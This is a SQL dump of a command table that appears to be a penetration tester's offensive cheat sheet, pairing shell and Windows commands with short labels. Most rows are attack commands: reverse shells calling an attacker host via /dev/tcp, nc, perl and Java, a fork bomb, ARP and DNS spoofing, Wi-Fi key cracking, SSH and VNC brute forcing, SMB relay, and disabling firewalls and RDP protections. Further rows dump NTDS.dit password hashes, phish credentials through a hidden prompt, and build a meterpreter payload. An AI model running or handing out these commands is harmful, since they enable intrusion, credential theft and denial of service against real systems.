INSERT INTO "TblCommand" VALUES(168,'reconfigure','Re-enable MSSQL xp_cmdshell','2017-01-30');
INSERT INTO "TblCommand" VALUES(169,'exec sp_configure ''xp_cmdshell'', 1','Re-enable MSSQL xp_cmdshell','2017-01-30');
INSERT INTO "TblCommand" VALUES(170,'go','Re-enable MSSQL xp_cmdshell','2017-01-30');
INSERT INTO "TblCommand" VALUES(171,'reconfigure','Re-enable MSSQL xp_cmdshell','2017-01-30');
INSERT INTO "TblCommand" VALUES(172,'/data/hacking/sqlmap/sqlmap.py --exclude-sysdbs --eta --is-dba --current-user --current-db --hostname -o ','SQLmap','2017-01-30');
INSERT INTO "TblCommand" VALUES(173,'etterfilter *.filter -o smb.ef','ARP Spoofing filter','2017-01-30');
INSERT INTO "TblCommand" VALUES(174,'ettercap -i em1 -L etter.log -T -M arp:remote /192.168.104.254/// ////','ARP Spoofing gateway','2017-01-30');
INSERT INTO "TblCommand" VALUES(175,'ettercap -i wlan0 -L etter.log -T -M arp:remote -L [CLIENT+TARGET].log /[GW IP]// /[TARGET IP]//','ARP Spoofing everything','2017-01-30');
INSERT INTO "TblCommand" VALUES(176,'ettercap -i wlan0 -L etter.log -T -P dns_spoof -M arp:remote -L [CLIENT+TARGET].log /[GW IP]// /[TARGET IP]//','ARP Spoofing DNS','2017-01-30');
INSERT INTO "TblCommand" VALUES(177,'ipcalc -b [CIDR Subnet]','Subnet calculator','2017-01-30');
INSERT INTO "TblCommand" VALUES(178,'tcpdump -n -i em1','TCPDump (no DNS resolution)','2017-01-30');
INSERT INTO "TblCommand" VALUES(179,'arping -I em1 [TARGET IP]','ARPing','2017-01-30');
INSERT INTO "TblCommand" VALUES(180,'for a in {0..254}; do arping -D -c 1 -I eth0 [NETWORK].$a; done | tee arping-[NET].txt','ARPing sweep netwoek','2017-01-30');
INSERT INTO "TblCommand" VALUES(181,'ifconfig eth0 192.168.0.x/24','Temporary IP','2017-01-30');
INSERT INTO "TblCommand" VALUES(182,'airmon-ng start wlan1','Wireless survey WIFI','2017-01-30');
INSERT INTO "TblCommand" VALUES(183,'ifconfig wlan0 down; iwconfig wlan0 mode monitor; ifup wlan0','Wireless survey WIFI','2017-01-30');
INSERT INTO "TblCommand" VALUES(184,'airodump-ng -c [Channel #] --bssid [MAC Address] --showack -w [SSID] wlan1mon','WIFI WPA handshake capture','2017-01-30');
INSERT INTO "TblCommand" VALUES(185,'wpaclean [OUTPUT] [INPUT]','WIFI WPA handshake prep','2017-01-30');
INSERT INTO "TblCommand" VALUES(186,'aircrack-ng [INPUT.cap] -J [OUTPUT]','WIFI WPA handshake prep','2017-01-30');
INSERT INTO "TblCommand" VALUES(187,'aireplay-ng -0 0 --ignore-negative-one -e [SSID] -a [AP MAC] -c [VICTIM MAC] mon0','wep','2017-01-30');
INSERT INTO "TblCommand" VALUES(188,'aireplay-ng -1 0 -e [VICTIM SSID] -a [VICTIM MAC] -h 00:c0:ca:72:50:0b mon0','wep','2017-01-30');
INSERT INTO "TblCommand" VALUES(189,'aireplay-ng -3 -b [VICTIM MAC] -h 00:c0:ca:72:50:0b mon0','wep','2017-01-30');
INSERT INTO "TblCommand" VALUES(190,'aircrack-ng -b [VICTIM MAC] [OUTPUT]*cap','wep','2017-01-30');
INSERT INTO "TblCommand" VALUES(191,'iptables -I OUTPUT -d [DST IP] -j DROP','Block outbound rule','2017-01-30');
INSERT INTO "TblCommand" VALUES(192,'iptables -I INPUT -p tcp --destination-port [PORT] -j ACCEPT','Accept inbound port rule','2017-01-30');
INSERT INTO "TblCommand" VALUES(193,'hydra -V -f -l root -P ~/hacking/dictionaries/rockyou.dic [TARGET IP] ssh | tee hydra-[DOMAIN]-ssh.txt','Hydra SSH dic brute force','2017-01-30');
INSERT INTO "TblCommand" VALUES(194,'medusa -M ssh -U userlist -P passwordlist -h [host]','medusa brute force','2017-01-30');
INSERT INTO "TblCommand" VALUES(195,'./mp64.bin -o custom.dic -1 tT -2 eE3 -3 ?s ?1qq?2qqq?2?2qq?2?3?3','Word list generator','2017-01-30');
INSERT INTO "TblCommand" VALUES(196,'/data/hacking/hashcat-0.49/hashcat-cli64.bin -m 99999 wordseed.dic -r /data/hacking/hashcat-0.49/rules/leetspeak.rule --stdout | sort -u > custom.dic','Word list generator','2017-01-30');
INSERT INTO "TblCommand" VALUES(197,'ncrack -v -d1 -T5 -P /usr/share/wordlists/rockyou.txt [service eg vnc]://[target IP]:[port eg 5900] -oA [output file]-ncrack.txt','brute force ncrack vnc','2017-01-30');
INSERT INTO "TblCommand" VALUES(198,'dig -t AXFR [FQDN] @[SERVER IP]','DNS zone transfer','2017-01-30');
INSERT INTO "TblCommand" VALUES(199,'nbtscan -v -s : 192.168.0.0/24 >> nbtscan-[SUBNET].txt','NBTScan','2017-01-30');
INSERT INTO "TblCommand" VALUES(200,'for a in {0..254}; do nbtscan -v -s : 192.168.$a.0/24 >> nbtscan-192.168.$a.txt; done','NBTScan en masse','2017-01-30');
INSERT INTO "TblCommand" VALUES(201,'for a in {0..255}; do host -t ns $a.168.192.in-addr.arpa | grep -v "name server"; done >> networks.txt','network discovery RDNS','2017-01-30');
INSERT INTO "TblCommand" VALUES(202,'cat networks-dirty.txt | grep "^[0-9]" | awk {''print $1''} | awk -F "." {''print $3"."$2"."$1".0/24"''} | sort -u > nets.txt','network discovery RDNS','2017-01-30');
INSERT INTO "TblCommand" VALUES(203,'nmap -sS -n -v -T5 -iL networks-sorted.txt -oA nmapScan-ARP','network discovery RDNS','2017-01-30');
INSERT INTO "TblCommand" VALUES(204,'cat nmapScan-ARP.gnmap | grep "Status: Up" | awk {''print $2''} | awk -F "." {''print $1"."$2"."$3".0/24"''} | sort -u > networks-withlivehosts.txt','network discovery RDNS','2017-01-30');
INSERT INTO "TblCommand" VALUES(205,'python -m SimpleHTTPServer [PORT]','instant web server','2017-01-30');
INSERT INTO "TblCommand" VALUES(206,'smbrelayx.py -h [TARGETIP] -e [PAYLOAD exe]','smbrelay targeted','2017-01-30');
INSERT INTO "TblCommand" VALUES(207,'smbrelayx.py -e [PAYLOAD exe]','smbrelay reflection : note read into http -> smb refelction','2017-01-30');
INSERT INTO "TblCommand" VALUES(208,'/data/hacking/Responder/Responder.py -I eth0 -wrfFd --lm -i [YOUR IP]','responder NBNS LLMNR','2017-01-30');
INSERT INTO "TblCommand" VALUES(209,'smbclient -L [TARGET] -U [USER]','SMBClient','2017-01-30');
INSERT INTO "TblCommand" VALUES(210,'strings [FILENAME] --bytes=2 |grep "^sa$" -A 4','text in binaries','2017-01-30');
INSERT INTO "TblCommand" VALUES(211,'telnet [IP] 25','Telnet Mail','2017-01-30');
INSERT INTO "TblCommand" VALUES(212,'HELO [FQDN (preferably of genuine domain)]','Telnet Mail','2017-01-30');
INSERT INTO "TblCommand" VALUES(213,'MAIL FROM: [SENDER ADDRESS]','Telnet Mail','2017-01-30');
INSERT INTO "TblCommand" VALUES(214,'RCPT TO: [RECIPIENT ADDRESS]','Telnet Mail','2017-01-30');
INSERT INTO "TblCommand" VALUES(215,'DATA','Telnet Mail','2017-01-30');
INSERT INTO "TblCommand" VALUES(216,'Subject: [SUBJECT]','Telnet Mail','2017-01-30');
INSERT INTO "TblCommand" VALUES(217,'Date: [DATE not sure if UTC or what]','Telnet Mail','2017-01-30');
INSERT INTO "TblCommand" VALUES(218,'From: [REAL NAME] <[EMAIL]>','Telnet Mail','2017-01-30');
INSERT INTO "TblCommand" VALUES(219,'To: [REAL NAME] <[EMAIL]>','Telnet Mail','2017-01-30');
INSERT INTO "TblCommand" VALUES(220,'[MESSAGE]','Telnet Mail','2017-01-30');
INSERT INTO "TblCommand" VALUES(221,'. (don''t forget the full stop)','Telnet Mail','2017-01-30');
INSERT INTO "TblCommand" VALUES(222,'halberd -v -p 10 [URL]','load balance detection','2017-01-30');
INSERT INTO "TblCommand" VALUES(223,'/data/hacking/enum4linux-0.8.9/enum4linux.pl -a -u [USER] -p [PASS] [TARGET] | tee [CLIENTNAME].domainenum','enum4linux','2017-01-30');
INSERT INTO "TblCommand" VALUES(224,'cat [CLIENTNAME].domainenum | grep "^user" | cut -d ":" -f 2 | cut -d "]" -f 1 | cut -d "[" -f 2 > userlist.txt','enum4linux','2017-01-30');
INSERT INTO "TblCommand" VALUES(225,'/data/hacking/vlan-hopping/frogger.sh','frogger vlan hopping','2017-01-30');
INSERT INTO "TblCommand" VALUES(226,'vconfig add em1 [VLANID]','manual vlans','2017-01-30');
INSERT INTO "TblCommand" VALUES(227,'dhclient -d -v -4 -pf /tmp/dhclient.pid -lf /tmp/dhclient.lease em1','dhcp client','2017-01-30');
INSERT INTO "TblCommand" VALUES(228,'cat `find /var/lib/NetworkManager/*ens10* -type f -mmin -360 -ls | awk {''print $11''}`','dhcp lease rpm','2017-01-30');
INSERT INTO "TblCommand" VALUES(229,'cat `find /var/lib/dhcp/dhclient*eth0* -type f -mmin -360 -ls | awk {''print $11''}`','dhcp lease deb','2017-01-30');
INSERT INTO "TblCommand" VALUES(230,'ls -lt /var/lib/NetworkManager/','dhcp lease','2017-01-30');
INSERT INTO "TblCommand" VALUES(231,'route add -net [CIDR] gw [IP] [INTERFACE]','route table add','2017-01-30');
INSERT INTO "TblCommand" VALUES(232,'route del -net 0.0.0.0 gw 100.64.0.1 eth1','route table del','2017-01-30');
INSERT INTO "TblCommand" VALUES(233,'7z a -p -mem=AES report.zip [INPUT FILE]','Encrypted zip','2017-01-30');
INSERT INTO "TblCommand" VALUES(234,'./hashcat-cli64.bin --session=[SESSIONNAME] -m[hash ID] [input file] [dict file] --rules rules/[rule file e.g. best64.rule d3ad0ne.rule etc]','hashcat cpu','2017-01-30');
INSERT INTO "TblCommand" VALUES(235,'hc --gpu-temp-abort=100 --remove -m5500 netntlmv1.hash -a3 -1 ''?u?l?d'' ''?1?1?1?1?1?1?1?1'' -o hash.crack','hashcat kraken','2017-01-30');
INSERT INTO "TblCommand" VALUES(236,'500 MD5 Crypt / *nix MD5','hashcat types','2017-01-30');
INSERT INTO "TblCommand" VALUES(237,'1000 NTLM from hashdump','hashcat types','2017-01-30');
INSERT INTO "TblCommand" VALUES(238,'1100 MScashv1','hashcat types','2017-01-30');
INSERT INTO "TblCommand" VALUES(239,'2100 MScashv2','hashcat types','2017-01-30');
INSERT INTO "TblCommand" VALUES(240,'2500 WPA/WPA2','hashcat types','2017-01-30');
INSERT INTO "TblCommand" VALUES(241,'3000 LM from hashdump','hashcat types','2017-01-30');
INSERT INTO "TblCommand" VALUES(242,'5300 = IKE-PSK MD5','hashcat types','2017-01-30');
INSERT INTO "TblCommand" VALUES(243,'5400 = IKE-PSK SHA1','hashcat types','2017-01-30');
INSERT INTO "TblCommand" VALUES(244,'5500 NetNTLMv1','hashcat types','2017-01-30');
INSERT INTO "TblCommand" VALUES(245,'5600 NetNTLMv2','hashcat types','2017-01-30');
INSERT INTO "TblCommand" VALUES(246,'cvs checkout [package name]','cvs check out repo','2017-01-30');
INSERT INTO "TblCommand" VALUES(247,'cvs update -d .','cvs update local repo ','2017-01-30');
INSERT INTO "TblCommand" VALUES(248,'cvs commit -m "[Comment]" [File inc "package"]','cvs comit change with message','2017-01-30');
INSERT INTO "TblCommand" VALUES(249,'cvs add [File inc "package"]','cvs add a new file','2017-01-30');
INSERT INTO "TblCommand" VALUES(250,'cvs release [package or file in package]','cvs delete file','2017-01-30');
INSERT INTO "TblCommand" VALUES(251,'for a in $(cat ../nmap/IPs-HTTPS.txt); do sslscan $a; done | tee sslscan-[NET].txt','sslscan','2017-01-30');
INSERT INTO "TblCommand" VALUES(252,'openssl s_client -connect victim.com:443 (this shows the chain)','sslscan cert checks','2017-01-30');
INSERT INTO "TblCommand" VALUES(253,'openssl s_client -showcerts -connect victim.com:443 2>/dev/null | awk ''$0=="-----BEGIN CERTIFICATE-----" {p=1}; p; $0=="-----END CERTIFICATE-----" {p=0}'' (this pulls just the certificates for each in the chain)','sslscan cert checks','2017-01-30');
INSERT INTO "TblCommand" VALUES(254,'openssl x509 -noout -text | grep -i "signature algorithm\|before\|after\|issuer\|subject:" (split the above commands output and stick in here, then manually analyse)','sslscan cert checks','2017-01-30');
INSERT INTO "TblCommand" VALUES(255,'genpasswd [CHAR LENGTH]','Password Generator','2017-01-30');
INSERT INTO "TblCommand" VALUES(256,'iodine -P [pass] [server]','dns tunneling','2017-01-30');
INSERT INTO "TblCommand" VALUES(257,'nmap -sS -Pn --open -T5 -p- [portspoofip] | tee nmap-tcp-outbound.txt','nmap outbound tcp','2017-01-30');
INSERT INTO "TblCommand" VALUES(258,'nmap -Pn --open -T5 -sU -p- [portspoofip]| tee nmap-udp-outbound.txt','nmap outbound upd','2017-01-30');
INSERT INTO "TblCommand" VALUES(259,'nmap --script smb-security-mode.nse -p445 -iL [hostsfile] -oA nmap-SMBSigning ','nmap smb signing','2017-01-30');
INSERT INTO "TblCommand" VALUES(260,'nmap -sS -n -v -T4 -P0 -p- -oA nmap-tcp-scan -iL subnets.txt ','nmap devicemap all tcp','2017-01-30');
INSERT INTO "TblCommand" VALUES(261,'nmap -sU -n -v -T4 -P0 --top-ports 1000 -oA nmap-udp-scan -iL subnets.txt','nmap devicemap top 1000 udp','2017-01-30');
INSERT INTO "TblCommand" VALUES(262,'grep "Discovered open port" nmap-udp-scan.txt | sed "s/\// /g" | sed "s/ /\t/g" | awk -F "\t" {''print $7"\t"$5"\t"$4"\topen"''} > devicemap-udp.tsv','nmap devicemap','2017-01-30');
INSERT INTO "TblCommand" VALUES(263,'for file in $( ls -lash | grep ".gnmap" | awk {''print $10''} ); do cat $file | grep "Ports" | grep "open" | awk {''print $2''} | sort -u > IPs-`echo $file | cut -d "-" -f 2 | cut -d "." -f 1;`.txt; done','nmap service discovery','2017-01-30');
INSERT INTO "TblCommand" VALUES(264,'cat nmapScan-[SERVICE].gnmap | grep "Ports" | grep "open" | grep -v "open|filtered" | awk {''print $2''} | sort -u > IPs-[SERVICE].txt','nmap service discovery','2017-01-30');
INSERT INTO "TblCommand" VALUES(265,'cat users | awk ''{print substr ($0, 1, 1),$2}'' | tr [A-Z] [a-z] | sort | uniq','Convert a user list in format "first last" to flast','2017-01-31');
INSERT INTO "TblCommand" VALUES(266,'exec 5<>/dev/tcp/[me]/[port]; while read line 0<&5; do $line 2>&5 >&5; done','bash reverse shell using a file handle ''5''','2017-02-02');
INSERT INTO "TblCommand" VALUES(267,'rm -f /tmp/p; mknod /tmp/p p && nc [me] [port] 0/tmp/p','telnet reverse shell','2017-02-02');
INSERT INTO "TblCommand" VALUES(268,'telnet [me] [port]| /bin/bash | telnet [me] [lport]','telnet reverse shell','2017-02-02');
INSERT INTO "TblCommand" VALUES(269,'perl -MIO -e ''$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''','perl windows reverse shell','2017-02-02');
INSERT INTO "TblCommand" VALUES(270,'r = Runtime.getRuntime()','Ruby reverse shell','2017-02-02');
INSERT INTO "TblCommand" VALUES(271,'r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor()','Java reverse shell - replace ; with newline','2017-02-02');
INSERT INTO "TblCommand" VALUES(272,'nmap -iL hosts -sC --script http-screenshot -p 80,443,8080,8081,8443,8843,8000,9000,9090,9081,9091,8194,9103,9102,8192 -v -n ','Take a screenshot (https://necurity.co.uk/netsec/2015-04-20-Screenshots-with-Nmap/)','2017-02-02');
INSERT INTO "TblCommand" VALUES(273,'modprobe nbd max_part=16; qemu-nbd -c /dev/nbd0; fdisk -l /dev/nbd0 ','moount VDI disk image','2017-02-02');
INSERT INTO "TblCommand" VALUES(274,'losetup /dev/loop0 image.img ; kpartx -a /dev/loop0; vgscan; vgchange -ay changethishostname-vg; mount /dev/changethishostname-vg/root mnt/','Mount LVM filesytem / image','2017-02-02');
INSERT INTO "TblCommand" VALUES(275,'mount /dev/changethishostname-vg/root mnt/','Ecrypt FS mounting','2017-02-02');
INSERT INTO "TblCommand" VALUES(276,'cat DC_dump.txt | awk -F : ''{print $1":"$4}'' | sort -k 2 -t : > sorted_hash; cat ntlm_cracked | sort -k 1 > sorted_cracked; join -t : -1 2 sorted_hash -2 1 sorted_cracked >> pass_info','create medusa or hydra password list from crackedLM or NTLM hashes','2017-02-02');
INSERT INTO "TblCommand" VALUES(277,'netstat -tulpen','list network connections','2017-02-02');
INSERT INTO "TblCommand" VALUES(278,'ip xfrm state list','print vpn keys','2017-02-02');
INSERT INTO "TblCommand" VALUES(279,'echo 1 > /proc/sys/net/ipv4/ip_forward','enable ip forwarding in the kernel','2017-02-02');
INSERT INTO "TblCommand" VALUES(280,':(){:|:&;:','Fork Bomb : CRASH SYSTEM','2017-02-02');
INSERT INTO "TblCommand" VALUES(281,'iptables -t nat -A PREROUTING -p tcp -d [ip] --dport [port] -j LOG; iptables -t nat -A PREROUTING -p tcp -d [ip] --dport [port] -j DNAT --to-destination [rhost]:[rport]; iptables -A FORWARD -p tcp -d [ip] --dport [port] -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT','Iptables port forward','2017-02-02');
INSERT INTO "TblCommand" VALUES(282,'logins -p','list users without password','2017-02-02');
INSERT INTO "TblCommand" VALUES(283,'svsc -a','list services','2017-02-02');
INSERT INTO "TblCommand" VALUES(284,'prstat -a','list processes','2017-02-02');
INSERT INTO "TblCommand" VALUES(285,'ver','system information','2017-02-02');
INSERT INTO "TblCommand" VALUES(286,'ver','system information','2017-02-02');
INSERT INTO "TblCommand" VALUES(287,'xterm -bg black -title "TryH4rD3r" -e "ls -la;read"','Spawn a cmd in a gui window','2017-02-03');
INSERT INTO "TblCommand" VALUES(288,'rdpy-rdpscreenshot.py 1.1.1.1','Take a screenshot of a RDP server (provided by rdpy)','2017-02-03');
INSERT INTO "TblCommand" VALUES(289,'xwd -display [victim] :0 -root -out /tmp/[victim].xpm;xwd -display ip :0 -root -out /tmp/[victim].xpm; convert /tmp/[victim^Cxpm -resize 1280x1024 /tmp/[victim].jpg','take a screenshot from a open X11 and convert it to a jpg ','2017-02-04');
INSERT INTO "TblCommand" VALUES(290,'tcpdump -i ethO ''icmp[icmptype] == icmp-echoreply''','capture ping replies ','2017-02-04');
INSERT INTO "TblCommand" VALUES(291,'systeminfo /S [victim] /U [domain]/[user] /P [pass]','remote system info','2017-02-04');
INSERT INTO "TblCommand" VALUES(292,'fsutil fsinfo drives','list drives','2017-02-04');
INSERT INTO "TblCommand" VALUES(293,'reg query HKLM /f [text] /t REG SZ /s ','search for text in the reg','2017-02-04');
INSERT INTO "TblCommand" VALUES(294,'findstr /si [text] ''.txt|xml|xls'' ','grep for text in files','2017-02-04');
INSERT INTO "TblCommand" VALUES(295,'net view /domain','show hosts in the current domain or add a domain for searching','2017-02-04');
INSERT INTO "TblCommand" VALUES(296,'net share','current smb shares','2017-02-04');
INSERT INTO "TblCommand" VALUES(297,'net session','active sessions','2017-02-04');
INSERT INTO "TblCommand" VALUES(298,'net share [sharename] [folder] /GRANT:Everyone,FULL','Share a directory with the world, probly dont want the world ofc ','2017-02-04');
INSERT INTO "TblCommand" VALUES(299,'sc \\[victim] create [name] binpath=[pathtoexe] start= auto','Create a service on remote machine','2017-02-04');
INSERT INTO "TblCommand" VALUES(300,'xcopy /s \\[victim] \dir [directory]','copy a remote file to lcwd','2017-02-04');
INSERT INTO "TblCommand" VALUES(301,'shutdown /m \\[victim] /r /t 0 /f','remote shutdown','2017-02-04');
INSERT INTO "TblCommand" VALUES(302,'ipconfig /displaydns','show dnscache','2017-02-04');
INSERT INTO "TblCommand" VALUES(303,'netstat -anop | findstr LISTEN','listening ports','2017-02-04');
INSERT INTO "TblCommand" VALUES(304,'tftp -I [victim] GET [file]','download a filenetsh interface ip show ','2017-02-04');
INSERT INTO "TblCommand" VALUES(305,'netsh interface ip show ','show interface information','2017-02-04');
INSERT INTO "TblCommand" VALUES(306,'netsh interface ip set address local static [ip] [mask] [gw] [ID]','set static ip ','2017-02-04');
INSERT INTO "TblCommand" VALUES(307,'netsh interface ip set dns local static [ip]','set DNS server','2017-02-04');
INSERT INTO "TblCommand" VALUES(308,'netsh interface ip set address local dhcp','enable DHCP ','2017-02-04');
INSERT INTO "TblCommand" VALUES(309,'makecab [file]','compress file','2017-02-04');
INSERT INTO "TblCommand" VALUES(310,'wusa.exe /uninstall /kb: [id]','uninstall patch : 2871997 ','2017-02-04');
INSERT INTO "TblCommand" VALUES(311,'rundll32.dll user32.dll LockWorkstation','lock the workstation','2017-02-04');
INSERT INTO "TblCommand" VALUES(312,'netsh advfirewall set currentprofile state off;netsh advfirewall set allprofiles state off;','disable local firewall','2017-02-04');
INSERT INTO "TblCommand" VALUES(313,'reg add HKCU\Software\Policies\t1icrosoft\Windows\System /v DisableCHD /t','re-enable CMD ','2017-02-04');
INSERT INTO "TblCommand" VALUES(314,'psexec /accepteula \\[victim] -u [domain]\[user] -p [password] -c -f \\[victim]\[share\[file]','windows psexec : \\127.0.0.1\c$\cmd.exe -p can be pass OR hash','2017-02-04');
INSERT INTO "TblCommand" VALUES(315,'reg add "HKEY LOCAL t1ACHINE\SYSTEH\CurentControlSet\Control \TerminalServer" /v fDenyTSConnections /t REG_DWORD /d 0 /f ','enable RDP','2017-02-04');
INSERT INTO "TblCommand" VALUES(316,'reg add "HKEY LOCAL t1ACHINE\SYSTEt1\CurentControlSet\Control \TerminalServer\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f','Disable NLA on RDP','2017-02-04');
INSERT INTO "TblCommand" VALUES(317,'wmic startupwmic service','start wmic service','2017-02-04');
INSERT INTO "TblCommand" VALUES(318,'wmic process list full','list all processes','2017-02-04');
INSERT INTO "TblCommand" VALUES(319,'wmic ntdomain list','Domain and DC info','2017-02-04');
INSERT INTO "TblCommand" VALUES(320,'wmic qfe','list patches','2017-02-04');
INSERT INTO "TblCommand" VALUES(321,'wrnic process call create "[cmd]"','execute command','2017-02-04');
INSERT INTO "TblCommand" VALUES(322,'wmic process where name="[cmd]" call terminate','kill process','2017-02-04');
INSERT INTO "TblCommand" VALUES(323,'wmic logicaldisk get description,name','view logical shares','2017-02-04');
INSERT INTO "TblCommand" VALUES(324,'wmic /node:[victim] /user:[domain]\[user] /password:[password] process call create "\\[host]\[share]\[exe]"','execute command on remote host from remote smb share','2017-02-04');
INSERT INTO "TblCommand" VALUES(325,'wmic /node:[victim] computersystern get username ','get logged in users from the remote host','2017-02-04');
INSERT INTO "TblCommand" VALUES(326,'wmic /node:[victim] process list brief /every:1','list remote processes every second','2017-02-04');
INSERT INTO "TblCommand" VALUES(327,'wmic /node:"[victim]" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"','enble rdp on remote host','2017-02-04');
INSERT INTO "TblCommand" VALUES(328,'wmic netlogin where (name like "%[user]%") get numberoflogons ','How many times has someone logged in','2017-02-04');
INSERT INTO "TblCommand" VALUES(329,'wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """','unquoted service path search add node for remote sys','2017-02-04');
INSERT INTO "TblCommand" VALUES(330,'wmic /node:[victim] /user:"[domain]\[user]" /password:[pass] process call create "cmd /c vssadmin list shadows 2 &1 >> c:\temp\vss.txt" ','List volume shadow copies','2017-02-04');
INSERT INTO "TblCommand" VALUES(331,'wmic /node:[victim] /User:[domain]\[user]" /password:[pass] process call create "cmd /c vssadmin create shadow /for=C: 2 &1 >> C:\temp\create_vss.txt"','create volume shadow copy for c','2017-02-04');
INSERT INTO "TblCommand" VALUES(332,'wmic /node:[victim] /User:[domain]\[user]" /password:[pass] process call create "cmd /c copy \\?\GLOBALROOT\Device\[vsc]\Windows\System32\config\SYSTEM c:\temp\SYSTEM" 2 &1 >> c:\temp\copy_system.txt','copy system out of a volume shadow copy ','2017-02-04');
INSERT INTO "TblCommand" VALUES(333,'wmic /node:[victim] /User:[domain]\[user]" /password:[pass] process call create "cmd /c copy \\?\GLOBALROOT\Device\[vsc]\NTDS\NTDS.dit c:\temp\ntds.dit" 2 &1 >> c:\temp\copy_ntds.txt','copy out ntds from the voulme shadow copy','2017-02-04');
INSERT INTO "TblCommand" VALUES(334,'secretsdump.py -hashes LMHASH:NTHASH -system ../SYSTEM -ntds ../ntds.dit local | tee hashes','Parse the SYSTEM and ntds with impacket','2017-02-04');
INSERT INTO "TblCommand" VALUES(335,'invoke-webrequest','powershell wget','2017-02-04');
INSERT INTO "TblCommand" VALUES(336,'wget','also powershell wget','2017-02-04');
INSERT INTO "TblCommand" VALUES(337,'(new-object system.net.webclient).downloadFile("[url]","[dest]") ','also powershell wget','2017-02-04');
INSERT INTO "TblCommand" VALUES(338,'get-content','powershell type file','2017-02-04');
INSERT INTO "TblCommand" VALUES(339,'get-service','powershell services','2017-02-04');
INSERT INTO "TblCommand" VALUES(340,'get-psdrive','list of drives : cd Env:\ . . . mind . . . blown','2017-02-04');
INSERT INTO "TblCommand" VALUES(341,'get-help','RTFM *cough*','2017-02-04');
INSERT INTO "TblCommand" VALUES(342,'get-wmiobject -list ''netework''','list interfaces with wmi','2017-02-04');
INSERT INTO "TblCommand" VALUES(343,'[Net.DNS]::GetHostEntry("ip")','get dns addr tab after :: for more choices','2017-02-04');
INSERT INTO "TblCommand" VALUES(344,'Get-WmiObject -class win32 operatingsystem | select -property * | exportcsv c:\temp\os.txt','get system information','2017-02-04');
INSERT INTO "TblCommand" VALUES(345,'New-PSDrive -Persist -PSProvider FileSjstem -Root \\[ip]\tools -Name i','powershell mount remote share : think sysinternals remote share','2017-02-04');
INSERT INTO "TblCommand" VALUES(346,'Get-ChildItem -Path c:\ -Force -Recurse -Filter *.txt -ErrorAction SilentlyContinue | where {$_.LastWriteTime -gt "2017-01-13"}','txt files changed after the 13 Jan 2017','2017-02-04');
INSERT INTO "TblCommand" VALUES(347,'$ports=([ports]);$ip=[ip];foreach ($port in $ports){try{$socket=New-Object System.Net.Sockets.TCPClient($ip,$port);}catch{}; if $socket -eq $NULL {echo $ip ": "$port" : Closed";}else{echo $ip ": "$port" : Open";}$socket = $NULL;}}','powershell port scanning','2017-02-04');
INSERT INTO "TblCommand" VALUES(348,'$ping = New-Object System.Net.Networkinformation.ping;$ping.Send("[ip]",50O);','Ping ip with timeout of 500','2017-02-04');
INSERT INTO "TblCommand" VALUES(349,'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $Host.UI.PromptForCredential("[title]","[message]","[user]","[domain]") ','Ask user for credentials','2017-02-04');
INSERT INTO "TblCommand" VALUES(350,'powershell.exe -Command "do {if ((Get-Date -format yyyymmdd-HHmm) -match ''201308(0[8-9]|1[0-1])|0[8-9]|1[0-7])[0-5][0-9]''){Start-Process -WindowStyle Hidden "[exe]";Start-Sleep -s 14400}}while(1)"','powershell run on schedule, match says when run','2017-02-04');
INSERT INTO "TblCommand" VALUES(351,'powershell.exe Send-MailMessage -to "[victim]" -from "[from]" -subject "[subject]" -a "[Attach file path]" -body "[Body]" -SmtpServer [ServerIP]','Powershell send an email','2017-02-04');
INSERT INTO "TblCommand" VALUES(352,'Get-WmiObject -ComputerName [DC] -Namesapce root\microsoftDNS -class MicrosoftDNS_ResourceRecord -Filter "domainname=''[domain]'' | select textrepresentation','list hostname and ip for domain pc''s','2017-02-04');
INSERT INTO "TblCommand" VALUES(353,'powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback{$true}$server="[$ip]/[script]";$filepath="c:/temp/SYSTEM";$http = new-object System.Net.Webclient; $response = $http.uploadFile($server,$filepath);"','Powershell upload file VIA post, script must write this out','2017-02-04');
INSERT INTO "TblCommand" VALUES(354,'msfvenom -p Windows/meterpreter/reverse_https -f psh -a x86 LHOST=[lhost] LPORT=[lport] audit.ps1','powershell shell, run with XXX cant be arsed to type it out at the moment','2017-02-04');
INSERT INTO "TblCommand" VALUES(355,'HKLM\Software\Microsoft\Windows NT\CurrentVersion','Windows information in the reg','2017-02-04');
INSERT INTO "TblCommand" VALUES(356,'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU','Mapped drives in reg','2017-02-04');
INSERT INTO "TblCommand" VALUES(357,'HKLM\System\MountedDevices ','Mounted devices ','2017-02-04');
INSERT INTO "TblCommand" VALUES(358,'HKLM\System\CurrentControlSet\Enum\USBStor','USB Devices','2017-02-04');
INSERT INTO "TblCommand" VALUES(359,'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services\Tcpip\Parameters\IPEnableRouter ','enable ip routing in windows, use as GW','2017-02-04');
INSERT INTO "TblCommand" VALUES(360,'HKLM\Security\Policy\PolAdTev','Audit policy','2017-02-04');
INSERT INTO "TblCommand" VALUES(361,'HKLM\Software\Microsoft\Windows NT\CurrentControlSet\Services ','Kernel or User Services','2017-02-04');
INSERT INTO "TblCommand" VALUES(362,'HKLM|HKCU\Software ','Machine or User software','2017-02-04');
INSERT INTO "TblCommand" VALUES(363,'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs ','Recent Documents','2017-02-04');
INSERT INTO "TblCommand" VALUES(364,'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU & \OpenSaveMRU','Recent user location (MRU Most Recntly used)','2017-02-04');
INSERT INTO "TblCommand" VALUES(365,'HKCU\Software\Microsoft\Internet Explorer\TypedURLs ','Typed Urls','2017-02-04');
INSERT INTO "TblCommand" VALUES(366,'dsquery user -limit 0','list users','2017-02-04');
